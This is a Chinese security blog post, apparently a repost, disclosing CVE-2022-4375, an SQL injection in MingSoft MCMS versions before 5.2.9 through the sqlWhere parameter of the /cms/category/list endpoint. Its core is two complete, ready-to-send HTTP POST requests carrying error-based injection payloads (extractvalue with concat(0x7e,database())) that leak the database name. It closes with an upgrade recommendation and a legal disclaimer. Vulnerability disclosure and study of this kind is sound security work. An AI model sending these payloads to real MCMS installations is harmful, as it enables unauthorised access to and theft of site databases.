文章总结： 该文档披露了铭飞MCMS5.2.9之前版本存在SQL注入漏洞CVE-2022-4375。漏洞源于cms/category/list接口对sqlWhere参数处理不当导致报错注入。文中提供了利用extractvalue函数获取数据库信息的详细POC验证数据。建议用户及时关注厂商主页并升级至最新版本以修复该安全风险。 综合评分： 81 文章分类： 漏洞分析,漏洞POC,WEB安全

漏洞验证-铭飞CMS cms/category/list接口存在SQL注入(CVE-2022-4375)

Domren Domren

网安智界

2026年1月28日 11:12 浙江

一、漏洞描述

MingSoft MCMS是中国铭飞（MingSoft）公司的一个完整开源的 J2ee 系统。 MingSoft MCMS 5.2.9之前版本存在SQL注入漏洞，该漏洞源于对参数sqlWhere的错误操作导致sql注入。

二、验证POC

POST /cms/category/list? HTTP/1.1 Host: XXXX User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko Accept: */* Accept-Encoding: gzip,deflate Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 169

sqlWhere=[{“action”:””,”field”:”test` and extractvalue(1,concat(0x7e,database()))#”,”el”:”eq”,”model”:”contentTitle”,”name”:”文章标题”,”type”:”input”,”value”:”1″}]

POST /cms/category/list? HTTP/1.1 Host: XXXX User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko Accept: */* Accept-Encoding: gzip,deflate Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 181

sqlWhere=[{“action”:””,”field”:”category_sort`)=0 or extractvalue(1,concat(0x7e,database())) — “,”el”:”eq”,”model”:”contentTitle”,”name”:”文章标题”,”type”:”input”,”value”:”1″}]

注：category_sort为上面得到的数据库名

三、验证截图

四、整改建议

目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.mingsoft.net/

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：网安智界 Domren Domren《漏洞验证-铭飞CMS cms/category/list接口存在SQL注入(CVE-2022-4375)》